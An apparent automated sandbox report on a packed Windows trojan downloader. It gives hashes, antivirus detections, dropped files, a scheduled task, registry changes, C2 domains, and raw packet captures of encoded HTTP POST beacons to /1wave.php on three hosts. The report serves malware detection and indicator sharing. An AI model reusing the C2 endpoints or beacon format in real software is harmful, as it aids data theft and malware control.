Analysis Date2014-04-24 00:27:12
MD56c5b3397ef6018e87aa62a0f31b3b29c
SHA12ea57431444e108f256c35b609d2645f9582226d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: ce8fb83a09586acda55ec3f4baad402a sha1: e779e363872bb65cc71e7606f45ef5fdacf20478 size: 135680
Section.rsrc md5: 1839f8fd68657a438962f73dc29d6de5 sha1: ca5442c6dbd30986e2dbd8fd00f6220b057b1b98 size: 1024
Timestamp1992-06-19 22:22:17
PackerUPX -> www.upx.sourceforge.net
PEhash8b20fdecfef3730326fb9fdcb9dce87ee8bedeef
IMPhashcfd9ba3bc50c6e5088b1caaf77c9f88f
AVaviraTR/Kazy.maklt
AVmsseTrojanDownloader:Win32/Renos.PG
AVavgDownloader.Generic11.GNR
AVclamavTrojan.Downloader-104233
AVmcafeeDownloader-CEW.ak

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\2SPI9KEA4C\OhuD ➝
5
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNSameba.jp
Type: A
180.233.142.60
DNSwretch.cc
Type: A
87.248.120.148
DNSwretch.cc
Type: A
68.180.206.184
DNSwretch.cc
Type: A
106.10.165.51
DNSwretch.cc
Type: A
98.139.102.145
DNSwretch.cc
Type: A
77.238.178.122
DNSfqplus.com
Type: A
184.168.192.6
DNSbaqwi.com
Type: A
209.222.14.3
DNStesyeux.com
Type: A
54.209.129.218
HTTP POSThttp://fqplus.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://baqwi.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://tesyeux.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 184.168.192.6:80
Flows TCP192.168.1.1:1032 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1033 ➝ 54.209.129.218:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206671   ncoded..Host: fq
0x00000060 (00096)   706c7573 2e636f6d 0d0a5573 65722d41   plus.com..User-A
0x00000070 (00112)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000080 (00128)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000090 (00144)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000a0 (00160)   204e5420 352e3029 0d0a436f 6e74656e    NT 5.0)..Conten
0x000000b0 (00176)   742d4c65 6e677468 3a203330 350d0a43   t-Length: 305..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x000000d0 (00208)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000e0 (00224)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x000000f0 (00240)   613d652f 65367235 4a5a5231 30466977   a=e/e6r5JZR10Fiw
0x00000100 (00256)   6f474c67 35315167 4339686e 6245786f   oGLg51QgC9hnbExo
0x00000110 (00272)   32316174 33614f59 6773552f 484c6b7a   21at3aOYgsU/HLkz
0x00000120 (00288)   66336375 77704474 52737935 2b65305a   f3cuwpDtRsy5+e0Z
0x00000130 (00304)   5a523733 6c455878 7a394854 74653678   ZR73lEXxz9HTte6x
0x00000140 (00320)   33306564 63736477 4d4a4f64 41462f56   30edcsdwMJOdAF/V
0x00000150 (00336)   6a567357 48463045 79377a44 4a57392f   jVsWHF0Ey7zDJW9/
0x00000160 (00352)   73394a45 724a3070 66723832 51593662   s9JErJ0pfr82QY6b
0x00000170 (00368)   38484367 53754e61 55716967 346f5633   8HCgSuNaUqig4oV3
0x00000180 (00384)   4242774b 3274327a 37335247 65795544   BBwK2t2z73RGeyUD
0x00000190 (00400)   6a677375 48467043 4c4f696b 5250534c   jgsuHFpCLOikRPSL
0x000001a0 (00416)   39536a75 50314942 38624b70 6a746d4a   9SjuP1IB8bKpjtmJ
0x000001b0 (00432)   30696733 566d5663 4638616f 4f724252   0ig3VmVcF8aoOrBR
0x000001c0 (00448)   52437964 624b5067 4f69452f 6b7a6a67   RCydbKPgOiE/kzjg
0x000001d0 (00464)   4d764145 436d5643 62664b72 4e653657   MvAECmVCbfKrNe6W
0x000001e0 (00480)   6c486768 6b45546a 2f6b4776 38463630   lHghkETj/kGv8F60
0x000001f0 (00496)   5552444d 50686e34 70644941 44714678   URDMPhn4pdIADqFx
0x00000200 (00512)   42482f34 764f3845 7268676c 32555977   BH/4vO8Erhgl2UYw
0x00000210 (00528)   536c6572 344d4378 3079415a 3444       Sler4MCx0yAZ4D

0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206261   ncoded..Host: ba
0x00000060 (00096)   7177692e 636f6d0d 0a557365 722d4167   qwi.com..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000090 (00144)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000a0 (00160)   4e542035 2e30290d 0a436f6e 74656e74   NT 5.0)..Content
0x000000b0 (00176)   2d4c656e 6774683a 20333035 0d0a436f   -Length: 305..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000d0 (00208)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000e0 (00224)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x000000f0 (00240)   3d652f65 3672354a 5a523130 4669776f   =e/e6r5JZR10Fiwo
0x00000100 (00256)   474c6735 31516743 39686e62 45786f32   GLg51QgC9hnbExo2
0x00000110 (00272)   31617433 614f5967 73552f48 4c6b7a66   1at3aOYgsU/HLkzf
0x00000120 (00288)   33637577 70447452 7379352b 65305a5a   3cuwpDtRsy5+e0ZZ
0x00000130 (00304)   5237336c 4558787a 39485474 65367833   R73lEXxz9HTte6x3
0x00000140 (00320)   30656463 7364774d 4a4f6441 462f566a   0edcsdwMJOdAF/Vj
0x00000150 (00336)   56735748 46304579 377a444a 57392f73   VsWHF0Ey7zDJW9/s
0x00000160 (00352)   394a4572 4a307066 72383251 59366238   9JErJ0pfr82QY6b8
0x00000170 (00368)   48436753 754e6155 71696734 6f563342   HCgSuNaUqig4oV3B
0x00000180 (00384)   42774b32 74327a37 33524765 7955446a   BwK2t2z73RGeyUDj
0x00000190 (00400)   67737548 4670434c 4f696b52 50534c39   gsuHFpCLOikRPSL9
0x000001a0 (00416)   536a7550 31494238 624b706a 746d4a30   SjuP1IB8bKpjtmJ0
0x000001b0 (00432)   69673356 6d566346 38616f4f 72425252   ig3VmVcF8aoOrBRR
0x000001c0 (00448)   43796462 4b50674f 69452f6b 7a6a674d   CydbKPgOiE/kzjgM
0x000001d0 (00464)   76414543 6d564362 664b724e 6536576c   vAECmVCbfKrNe6Wl
0x000001e0 (00480)   4867686b 45546a2f 6b477638 46363055   HghkETj/kGv8F60U
0x000001f0 (00496)   52444d50 686e3470 64494144 71467842   RDMPhn4pdIADqFxB
0x00000200 (00512)   482f3476 4f384572 68676c32 55597753   H/4vO8Erhgl2UYwS
0x00000210 (00528)   6c657234 4d437830 79415a34 4444       ler4MCx0yAZ4DD

0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a207465   ncoded..Host: te
0x00000060 (00096)   73796575 782e636f 6d0d0a55 7365722d   syeux.com..User-
0x00000070 (00112)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000080 (00128)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000090 (00144)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x000000a0 (00160)   73204e54 20352e30 290d0a43 6f6e7465   s NT 5.0)..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 30350d0a   nt-Length: 305..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x000000d0 (00208)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x000000e0 (00224)   3a206e6f 2d636163 68650d0a 0d0a6461   : no-cache....da
0x000000f0 (00240)   74613d65 2f653672 354a5a52 31304669   ta=e/e6r5JZR10Fi
0x00000100 (00256)   776f474c 67353151 67433968 6e624578   woGLg51QgC9hnbEx
0x00000110 (00272)   6f323161 7433614f 59677355 2f484c6b   o21at3aOYgsU/HLk
0x00000120 (00288)   7a663363 75777044 74527379 352b6530   zf3cuwpDtRsy5+e0
0x00000130 (00304)   5a5a5237 336c4558 787a3948 54746536   ZZR73lEXxz9HTte6
0x00000140 (00320)   78333065 64637364 774d4a4f 6441462f   x30edcsdwMJOdAF/
0x00000150 (00336)   566a5673 57484630 4579377a 444a5739   VjVsWHF0Ey7zDJW9
0x00000160 (00352)   2f73394a 45724a30 70667238 32515936   /s9JErJ0pfr82QY6
0x00000170 (00368)   62384843 6753754e 61557169 67346f56   b8HCgSuNaUqig4oV
0x00000180 (00384)   33424277 4b327432 7a373352 47657955   3BBwK2t2z73RGeyU
0x00000190 (00400)   446a6773 75484670 434c4f69 6b525053   DjgsuHFpCLOikRPS
0x000001a0 (00416)   4c39536a 75503149 4238624b 706a746d   L9SjuP1IB8bKpjtm
0x000001b0 (00432)   4a306967 33566d56 63463861 6f4f7242   J0ig3VmVcF8aoOrB
0x000001c0 (00448)   52524379 64624b50 674f6945 2f6b7a6a   RRCydbKPgOiE/kzj
0x000001d0 (00464)   674d7641 45436d56 4362664b 724e6536   gMvAECmVCbfKrNe6
0x000001e0 (00480)   576c4867 686b4554 6a2f6b47 76384636   WlHghkETj/kGv8F6
0x000001f0 (00496)   30555244 4d50686e 34706449 41447146   0URDMPhn4pdIADqF
0x00000200 (00512)   7842482f 34764f38 45726867 6c325559   xBH/4vO8Erhgl2UY
0x00000210 (00528)   77536c65 72344d43 78307941 5a3444     wSler4MCx0yAZ4D


Strings
h.
.
.
.
.@u.
0bvK7<
1a>|3k!a
-@1,Dj
(1NQ|T
2rK5	6
2T+ij4ST
2tO5]ln
?3DBAW
,;3`"X
4%Syas
4wxj\d
5p<kOOghZcv
%/~5qZX$
5WmkCa
6a#p"X
?6fcce987
	6{lR~@
=6uN|^
7@gC^	r
7M]z.|
>8iai%	H
92=%\*
9)5y!s^
9	,p3E
?:?*(a
A?1I<d
.A<.(b
advapi32.dll
AHXhLJ
aIRt}X
+a!p?*
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
_[av=+
A+w-7W
bGz[-~w
B{</ho
+)b=L4
b}ofTv
!B]tW_Y
Bu{$&|
bu8D<m6
b[=uGH 
+`C=Dmn
;CD;_w
C|=g4<U$
CMi't/3|
CO9m,{
cqs<t#
cs\,CT
[CT_(8
CW&T\N
D"6|uf
Di;WTC
\d|-kBM
dLibraryExW
DllRegisterServer
dSzqiSu
|]D|u@`4Kr
 []Dwp
d z_aT
eB!c7[f
e"+n55
ep$DM1
eqZP,@
ErHbz.
ExitProcess
fdF/J|
fk6UWM
+FM2}9
ftvyzMC
~]|F$x
g)d45uu
GD6"V"
}~gdqj|
GetFormW
GetProcAddress
GetSystemDefaultLCID
GllQCT
#gOpenKey=
%GS.BD$
_(Gv]N*	
[;@G ww
|h{&8#7
H9	8  (OF
H BH_<t
HeapReM
H&FT#<
/hj7Z6`<
hXv].D
&I.+<<
Ia;CX>)
iaO[yQ
".i[CC
I:CucRA
iO5<K]
i!^p.G
iVgJ }
iVrzQ:
JI9]0{-
jj[?6s
kb) gMP
KERNEL32.DLL
kH~&h^`
KM)zpu4td
k`rojpT
KV/](-
@l%6=l
~l`8bM=\b 
?lE7X4
LoadLibraryA
l.rMmo
m?>5^x
_m7NOJ
)$m 8|}
m F{9$0DC9.
m{g=-<
m}l*Ak
m[M_4^
m@RL(R
M?X*.s.
#m+~ Y
MZa.^gj=
n.fAte
/Nr)m 
O1K_G7
=O).2R1d
oleaut32.dll
op;`laH
OR }^6x(
<O-t4|
O't8`S
O<tv-b
<ov|<u
O|z{x	
P0Bwnv
P7$:x4-$
P$@>C(:
PgtPv=
;P| $Hf-
P<l;!W
Prq:0t
_q|d69
q#]ECle
QEv>hj
,qH?xl
r5305@
RegOpenKeyW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
R}{fN`u
R/nMPGles
r\[uTO
S.0[iI
S 9#(a
      </security>
      <security>
SetWindowLongW
-sQ&F 
]sr&GC
SSc_M)!
StringX
SXluwm
t;@<{(
T2i(l#
t71tA=
ta/dK;y
$|tGhs
This program must be run under Win32
tI'z,	
tLOD[V
##=tp1vh
#T_"@piw
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
t-R,XMSt
#t|sTP
t[xm6M
tyCla9'
t'yJ,X
u_8Do"
ueFcmW
ufl2num
(u(I@w
user32.dll
uW*!6l
uY="Xo
[v+'`$
@,-.V]
V$8E<o
{\V9p[
vA-<;O
vCY]2o9
v@_hmY
VirtualAlloc
VirtualFree
VirtualProtect
Vn":&@
?V)~#P
VR!1&G
V@[t"#
v]USZA
=vyAddss
Vznzl+
:`W5l	+ 
We$Bcl
whMvU@
winspool.drv
wTU2w\
/x40;}S
"/@]X64~
xgU_u~
xgX&ib
xm[hG-
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XmM?]r
XPTPSW
x@u_w$T2pi7
[[xYW$
xZXLdy0V
+$y]4<
yiZ3N#
yLJ~_a
yS9*WE@m
z-33JC5&
{)Z7_]
)zc[fy
Zda6Pb
Z[}LnWC
*zxts[